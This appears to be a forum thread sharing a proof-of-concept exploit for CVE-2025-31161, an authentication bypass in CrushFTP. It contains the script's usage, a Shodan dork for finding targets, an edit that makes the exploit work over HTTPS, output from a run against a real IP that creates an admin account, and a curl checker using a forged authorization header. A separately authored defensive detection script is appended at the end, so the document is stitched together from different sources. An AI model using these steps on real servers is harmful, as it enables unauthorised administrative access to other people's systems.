Remote CrushFTP Unauthenticated Administrative Access CVE-2025-31161

pianoxltd

CrushFTP versions 10 before 10.8.4 and 11 before 11.3.1

Proof of Concept for CVE-2025-31161
https://github.com/Immersive-Labs-Sec/CVE-2025-31161

Code:
usage: cve-2025-31161.py [-h] [--target_host TARGET_HOST] [--port PORT] [--target_user TARGET_USER] [--new_user NEW_USER] [--password PASSWORD]

Exploit CVE-2025-2825

options:
  -h, --help            show this help message and exit
  --target_host TARGET_HOST
                        Target host
  --port PORT           Target port
  --target_user TARGET_USER
                        Target user
  --new_user NEW_USER   New user to create
  --password PASSWORD   Password for the new user

shodan
Code:
http.favicon.hash:-1022206565
 
Yes, but this script does not work on HTTPS or on port 443, which is the company's main port. If you have tried it and it works, please let me know. It does not work for me.
 
Change lines 29-30 from http to https

Python:
    # First request details
    warm_up_url = f"http://{target_host}:{port}/WebInterface/function/"
    create_user_url = f"http://{target_host}:{port}/WebInterface/function/"
        
        
    # First request details
    warm_up_url = f"https://{target_host}:{port}/WebInterface/function/"
    create_user_url = f"https://{target_host}:{port}/WebInterface/function/"
 
python cve-2025-31161.py --target_host 193.218.95.34 --port 443
[+] Preparing Payloads
[-] Warming up the target
[-] Target is up and running
[+] Sending Account Create Request
[+] Exploit Complete you can now login with
[*] Username: king
[*] Password: qwerty123
No matter how many times I try, it does not log in with the logins I create.
 
checker
Bash:
curl -k "https://ip:port/WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=0559" -H "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/" -H "Cookie: CrushAuth=3498662122596_fUYaTtBtqskeuLjOcWvZSESqVxeL0559; currentAuth=0559"

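A defender-side triage sketch for the request shape in the checker command above, added here as an example (it is not code from the thread or from the linked repository): it flags WebInterface requests whose Authorization header is an AWS4-HMAC-SHA256 value cut off after the user name, and checks a version string against the affected ranges quoted in the first post. The record layout (`src`, `path`, `headers`), the function names and the sample records are constructed, and it assumes a proxy or WAF log that retains request headers.

```python
import re

# Fixed releases from the first post: 10.x before 10.8.4 and 11.x before 11.3.1 are affected.
FIXED = {10: (10, 8, 4), 11: (11, 3, 1)}
# Start of a SigV4 Authorization header: Credential=<id>/<scope>
SIGV4 = re.compile(r"^AWS4-HMAC-SHA256\s+Credential=([^/,\s]*)/([^,\s]*)", re.I)

def is_affected(version):
    """True if a CrushFTP version string falls in the affected ranges."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    parts += (0,) * (3 - len(parts))
    fixed = FIXED.get(parts[0])
    return fixed is not None and parts < fixed

def truncated_sigv4_user(req):
    """Return the user named in an incomplete SigV4 header sent to the
    WebInterface API, or None if the request does not match."""
    if not req["path"].startswith("/WebInterface/function/"):
        return None
    auth = req["headers"].get("Authorization", "")
    m = SIGV4.match(auth)
    if not m:
        return None
    # A complete header has a 4-part scope (date/region/service/aws4_request)
    # plus SignedHeaders= and Signature= fields.
    scope = m.group(2).split("/")
    complete = len(scope) == 4 and "SignedHeaders=" in auth and "Signature=" in auth
    return None if complete else m.group(1)

def scan(records):
    """Return (source, user) for every record worth an analyst's look."""
    hits = []
    for r in records:
        user = truncated_sigv4_user(r)
        if user is not None:
            hits.append((r["src"], user))
    return hits

# Constructed sample records (documentation IP ranges), not real traffic.
SAMPLE = [
    {"src": "198.51.100.7", "path": "/WebInterface/function/?command=getUserList",
     "headers": {"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/"}},
    {"src": "192.0.2.10", "path": "/WebInterface/function/?command=getUserList",
     "headers": {"Cookie": "CrushAuth=placeholder"}},
    {"src": "192.0.2.11", "path": "/WebInterface/function/",
     "headers": {"Authorization": "AWS4-HMAC-SHA256 Credential=AKIDEXAMPLE/20250401/"
                 "us-east-1/s3/aws4_request, SignedHeaders=host, Signature=abc123"}},
]

if __name__ == "__main__":
    print(scan(SAMPLE), is_affected("11.3.0"), is_affected("11.3.1"))
```

A hit on a host where `is_affected` is true for the installed version is the case to escalate; follow it with a review of the server's user list for accounts nobody on the team created.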

